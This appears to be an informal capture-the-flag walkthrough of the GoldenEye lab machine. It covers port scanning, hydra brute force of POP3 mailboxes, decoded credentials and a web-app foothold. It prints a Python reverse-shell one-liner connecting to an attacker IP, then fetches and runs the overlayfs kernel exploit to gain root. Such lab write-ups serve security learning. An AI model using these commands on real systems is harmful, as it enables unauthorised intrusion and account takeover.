nmap -sV -sC -sT -p- 10.X.X.X

||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

dirb gives ->
+ http://10.X.X.X/index.html (CODE:200|SIZE:252)                                                                                                                                           
+ http://10.X.X.X/server-status (CODE:403|SIZE:289)


||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

//
//Boris, make sure you update your default password. 
//My sources say MI6 maybe planning to infiltrate. 
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
//
//BTW Natalya says she can break your codes


decode password ->
InvincibleHack3r
username -> boris  //not Boris


||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||


ı tryed brute force attack to pop3 server
hydra -L users.txt -P fasttrack.txt pop3://10.0.2.23:55007 

[55007][pop3] host: 10.X.X.X   login: boris   password: secret1!

[55007][pop3] host: 10.X.X.X   login: natalya   password: bird


||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||


nc 10.X.X.X 55007
+OK GoldenEye POP3 Electronic-Mail System
AUTH
+OK
PLAIN
.
USER boris
+OK
PASS secret1!
+OK Logged in.
LIST
+OK 3 messages:
1 544
2 373
3 921
.
RETR 1
+OK 544 octets
Return-Path: <root@127.0.0.1.goldeneye>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id D9E47454B1
        for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: root@127.0.0.1.goldeneye

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.

RETR 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id C3F2B454B1
        for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!
.

RETR 3
+OK 921 octets
Return-Path: <alec@janus.boss>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id 4B9F4454B1
        for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: alec@janus.boss

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.

.

||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

Lets find out natalya's mail server

nc 10.X.X.X 55007
+OK GoldenEye POP3 Electronic-Mail System
AUTH
+OK
PLAIN
.
USER natalya
+OK
PASS bird
+OK Logged in.
LIST
+OK 2 messages:
1 631
2 1048
.
RETR 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id D5EDA454B1
        for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.

||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

Fınally ı found some data...

RETR 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 17C96454B1
        for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.


.

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

nano /etc/hosts
add -> local ip , severnaya-station.com and save&quit

go to -> severnaya-station.com/gnocertdir
login with -> username: xenia  password: RCP90rulez!


|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

lets try to crack dr doak account

hydra -l doak -P fasttrack.txt pop3://10.X.X.X:55007

[55007][pop3] host: 10.X.X.X   login: doak   password: goat


|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

nc 10.X.X.X 55007
+OK GoldenEye POP3 Electronic-Mail System
AUTH
+OK
PLAIN
.
USER doak
+OK
PASS goat
+OK Logged in.
LIST
+OK 1 messages:
1 606
.
RETR 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 97DC24549D
        for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

.

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

after login dr doak ı saw my private files and ı download s3cret.txt
message here;

007,

I was able to capture this apps adm1n cr3ds through clear txt. 

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here. 

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.


|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

ı saw jpg properties and ı saw description 

eFdpbnRlcjE5OTV4IQ==   lets decode base64 -> xWinter1995x! 
this probably admin user password , so lets try

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

username: admin
password : xWinter1995x!

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

lets open the reverse shell
change path to aspell 

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.15",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

press save button

lets open nc -lvp 1234

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

after go to spell checkers setting and set our spell checker
go to new blog page and use spell checker


|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||


lets open shell in server

python -c 'import pty; pty.spawn("/bin/bash")'

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||


time to privilege escalation...

lets try to install LinEnum in tmp file

wget https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

chmod +x LinEnum.sh

./LinEnum.sh  -> gives me ./LinEnum.sh: line 8: syntax error near unexpected token `newline'  that is interesting...

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

lets try the another method

u name -a

Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

lets find exploits

searchsploit ubuntu 3.13.0

searchsploit -w  ubuntu 3.13.0

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | https://www.exploit-db.com/exploits/37292   -> go to this web site and download exploit

lets open service -> service apache2 start

and download from our apache2 service

tmp$ wget http://10.0.2.15/37292.c


gcc 37292.c   -> The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'


lets configure 37292.c in our os

find gcc and remove g letter

rm 37292.c

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

wget http://10.X.X.X/37292.c

after download again we have to make executeable file

cc 37292.c -o rootexploit

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

./rootexploit

finally ı am root :)

lets go root file and read .flag.txt

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

cat .flag.txt


Alec told me to place the codes here: 

568628e0d993b1973adc718237da6e93

If you captured this make sure to go here.....
/006-final/xvf7-flag/

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

lets check out web site ->http://10.0.2.23//006-final/xvf7-flag/


finally done... :)


|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

Flag Captured

Congrats! *******************************

You've captured the codes! And stopped Alec Trevelyan from his indestructible vengeance!!!!

****************************************


